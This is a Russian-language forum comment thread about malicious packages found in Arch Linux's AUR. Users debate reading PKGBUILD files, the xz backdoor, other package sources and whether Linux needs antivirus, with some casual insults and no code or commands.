Ответить | Правка | Наверх | Cообщить модератору

82. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  –1 +/
Сообщение от ЖИРОПЕРДЯСТИК (?), 02-Авг-25, 10:53 
> Таких васянов там сразу отлавливают

Главное верить. Тысячегласс смотрят!

Ответить | Правка | К родителю #52 | Наверх | Cообщить модератору

99. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +1 +/
Сообщение от Аноним (57), 02-Авг-25, 12:38 
> Тысячегласс смотрят!

https://skillbox.ru/upload/setka_images/11561419052025_44197...

Ответить | Правка | Наверх | Cообщить модератору

94. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Пояснительная бригада (?), 02-Авг-25, 12:14 
Not a bug, а фича. Нормальный aur helper перед установкой любого пакета оттуда сначала показывает pkgbuild файл, а дальше всё зависит от прослойки между монитором и креслом.
Ответить | Правка | К родителю #42 | Наверх | Cообщить модератору

135. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Аноним (38), 02-Авг-25, 18:35 
Посмотри как в xz бэкдор всунули и подумай, поможет ли тебе чтение pkgbuild файлов.
Ответить | Правка | Наверх | Cообщить модератору

45. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Аноним (45), 02-Авг-25, 07:44 
А что ваш там pip или npm прям безопасны да? Или PPA Ubuntu?
Берешь себе за правило - изучать каждый PKGBUILD и всё, проблема решена!
Собственно, по мимо администраторов, юзеры тоже могут проверять PGBUILDы и указывать на нарушения. Ну и не хрен ставить все подряд, не думая и не проверяя, такой подход угробит любую ОСь, хоть даже винду, мак или андроид.
Ответить | Правка | Наверх | Cообщить модератору

53. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  –2 +/
Сообщение от Anonimm (?), 02-Авг-25, 08:18 
> изучать каждый PKGBUILD

А потом удивляться, что вас всего 4%..

Ответить | Правка | Наверх | Cообщить модератору

81. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Аноним (75), 02-Авг-25, 10:51 
> вас всего 4%

Нас даже официально 5%. Не считая суверенных установок, которые используются во всем мире, а не только в РФ, "как думают некоторые студенты", и вряд ли попадают в данную статистику.

Ответить | Правка | Наверх | Cообщить модератору

121. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Пояснительная бригада (?), 02-Авг-25, 15:01 
Тебе надо 146%?
Ответить | Правка | К родителю #53 | Наверх | Cообщить модератору

134. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Аноним (141), 02-Авг-25, 18:27 
> А потом удивляться, что вас всего 4%..

Умных людей во все времена было мало

Ответить | Правка | К родителю #53 | Наверх | Cообщить модератору

137. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Аноним (38), 02-Авг-25, 18:36 
Наличие ума и линукса на десктопе имеет обратную корреляцию.
Ответить | Правка | Наверх | Cообщить модератору

139. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Аноним (141), 02-Авг-25, 19:15 
Цитаты вяликих людей?
Ответить | Правка | Наверх | Cообщить модератору

63. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Аноним (63), 02-Авг-25, 09:13 
А ведь в убунтовском launchpad ppa не меньше, или даже больше малвари от ноунэйм авторов. А в aur то не бинари, а pkgbuild, что как бы позволяет увидеть подмену.
Ответить | Правка | Наверх | Cообщить модератору

87. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +1 +/
Сообщение от Аноним (87), 02-Авг-25, 11:58 
> А в aur то не бинари

Говоришь так, будто бы их там нет...

Ответить | Правка | Наверх | Cообщить модератору

119. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Аноним (113), 02-Авг-25, 14:52 
Для тугодумов разжую. PKGBUILD это простой bash скрипт, даже если пакет собирается из бинарников, в этом скрипте находятся ссылки на источники с которых эти бинарники качаются. Никто не мешает заглянуть в PKGBUILD (хоть через вебморду) и убедится что файлы качаются с официального сайта/репозитория.
Ответить | Правка | Наверх | Cообщить модератору

67. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  –2 +/
Сообщение от Аноним (67), 02-Авг-25, 09:37 
Достаточно не ставить свежие пакеты из аур.
Ответить | Правка | Наверх | Cообщить модератору

73. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  –1 +/
Сообщение от 12yoexpert (ok), 02-Авг-25, 10:26 
это арч, там в принципе нет несвежих пакетов
Ответить | Правка | Наверх | Cообщить модератору

86. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +1 +/
Сообщение от Аноним (86), 02-Авг-25, 11:57 
Это проблема куда шире чем кажется. Разработчик вылежат своё ПО только под Win и Mac, он не будит собирать под 100500 диструбтивов Linux на 4% рынка дисктопов!
А пользователь хочет именно пользоваться ОС, то есть устанавливать ПО в пару кликов через GUI.
Вот здесь у тех, у кого красные глаза и бубен в руках решают монетанизировать свой мазахизм чёрными методами!
Ответить | Правка | Наверх | Cообщить модератору

95. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Пояснительная бригада (?), 02-Авг-25, 12:17 
Просто ввёл название пакета в терминал и установил его, даже не кликая мышью. чяднт? Или искать в интернетах удобнее?
Ответить | Правка | Наверх | Cообщить модератору

142. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Аноним (140), 02-Авг-25, 19:55 
виндузятнику же удобнее "бесплатно и без смс" - он по другому и не умеет...
Ответить | Правка | Наверх | Cообщить модератору

93. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Аноним (93), 02-Авг-25, 12:13 
От AUR отказала два года назад, когда скачал бинарник и решил проверить на вирустотал - бэкдор.
Ответить | Правка | Наверх | Cообщить модератору

96. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Пояснительная бригада (?), 02-Авг-25, 12:23 
Aур использую чтоб качать 1 пакет, zapret.
Ответить | Правка | Наверх | Cообщить модератору

97. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  –2 +/
Сообщение от Аноним (97), 02-Авг-25, 12:34 
Антивирус Линуксу не нужен!!

ВСЁ БЕЗОПАСНО!

РАСХОДИМСЯ!

Ответить | Правка | Наверх | Cообщить модератору

108. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +1 +/
Сообщение от Сообщение (?), 02-Авг-25, 13:50 
Кто так говорит, подразумевает, что пакеты будут ставиться из оф репов, а не из пользовательских файлопомоек
Ответить | Правка | Наверх | Cообщить модератору

110. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от 12yoexpert (ok), 02-Авг-25, 14:20 
иди погугли, чем троян отличается от вируса
Ответить | Правка | К родителю #97 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей 		Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру